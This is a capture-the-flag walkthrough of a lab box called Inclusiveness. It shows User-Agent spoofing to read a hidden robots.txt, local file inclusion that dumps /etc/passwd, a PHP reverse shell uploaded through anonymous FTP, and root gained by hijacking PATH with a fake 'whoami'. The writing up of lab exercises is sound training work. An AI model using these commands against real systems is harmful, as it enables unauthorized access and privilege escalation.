Proving Grounds: Inclusiveness



This was a great simple box where as long as you can do just a basic amount of enumeration, you should be fine. Simple boot-to-root box.


The standard nmap scan applies (once we actually find the machine): nmap -sT -sV -A <target ip>. We get ports 21, 22, and 80 open on The webpage shows a default Apache2 page. Nothing much here.

Default Apache2 page. You just need to trust that this isn't a screenshot from Google!

FTP port allows anonymous login. There's a "pub" folder with nothing in it.

Anonymous login success on our target.

SSH is never the answer, and this holds true for this box.

Going back to the website, we can try gobuster, which reveals what seems to be common files and directories: gobuster dir -x .php,.html,.txt,.cgi -u <target ip> -w <dictionary>. When we try going to "robots.txt" or any related page (seo.html, valid-robots.txt, etc...) we are greeted with an empty page that has a single line on it: "You are not a search engine! You can't read my robots.txt!". Challenge accepted >:)

Robots only!

Getting A Shell:

While hoping I'm not jumping into a rabbit hole, I determine what we need to do. Robots.txt is used by webcrawlers to allow/deny access to specific paths on the site. In our case, we aren't allowed to see this robots.txt file because we aren't a robot! The way a server identifies you is through the "User-Agent" heading sent by your browser. The user-agent tells the server what browser version, device, and even OS the client is using. What we need to do is send a request with a user-agent that belongs to a bot. My first attempt at this via curl was a fail: curl -L -H 'Googlebot/2.1 (+' <target ip>. I was served the familiar rejection line from above. It was odd that this didn't work because it was the first user-agent my brute-force script used, which DID work. I'll chalk it up to a fat-fingered typo.

To brute-force this page, I wrote a Python script that sends GET requests to "robots.txt" until the return doesn't contain the rejection string from above [1]. Through dumb stupidity, the first user-agent tried, worked! Which one was it? THE SAME ONE I TRIED IN THE CURL REQUEST!!! It's fine, just more coding practice.

My Python script showing a successful request

The robots.txt file reveals a directory: "/secret_information/". Navigating to it reveals a simple page describing a DNS Zone Transfer Attack. We can also see two links: "english" and "spanish" respectively. Clicking them changes the language of the page, but does so by passing a url param to the current page: lang="en.php".

The super secret directory!

So to change the language, the site requests a php page. This tells us that:

We can try going to "/etc/passwd/" instead of "en.php" and lo and behold, the site dumps the /etc/passwd file!

/etc/passwd being exposed via LFI

If you recall, we had access to an FTP server via anonymous login. We can log back in and upload a php reverse shell, which we can run through the LFI we now have.

Uploading our php reverse shell

A successful reverse shell!

Getting Root:

We can check "/home" for users and find "tom". Checking his home directory reveals a super discrete script and source code combo named "rootshell" and "rootshell.c". What we can only assume we need to do is exploit this script to get a root shell. First I'll extract the C code to my local machine for easier analysis.

Converting the source code to base64 for exfiltration

The code is very simple and involves checking the current user's name via "whoami" command. If it matched "tom", we get an EUID root shell (as the owner of the file is root).

Source code of rootshell.c

To exploit this script, we need to hijack the "whoami" command. For ease, get a better shell: python -c 'import pty;pty.spawn("/bin/bash")'. Next we'll move to a writeable directory, "/tmp", and create a file "whoami". In this file, all we need to do is print "tom". This can all be achieved in a Bash one-liner: echo $'#!/bin/bash echo "tom"' > ./whoami; chmod +x ./whoami. Before we can try the code again, we need to add /tmp to our PATH environment variable so the code knows where to find our hijacked script: export PATH=/tmp:${PATH}.

Exporting /tmp to PATH

We're done! Now we can go back to tom's home dir, run the script, and get the flag!

Running the script after setting up the command hijack, resulting in a successful root shell

The flag (but blurred; no cheating)!


User-Agent Attack

User-Agent List

Last edit: 2021.09.09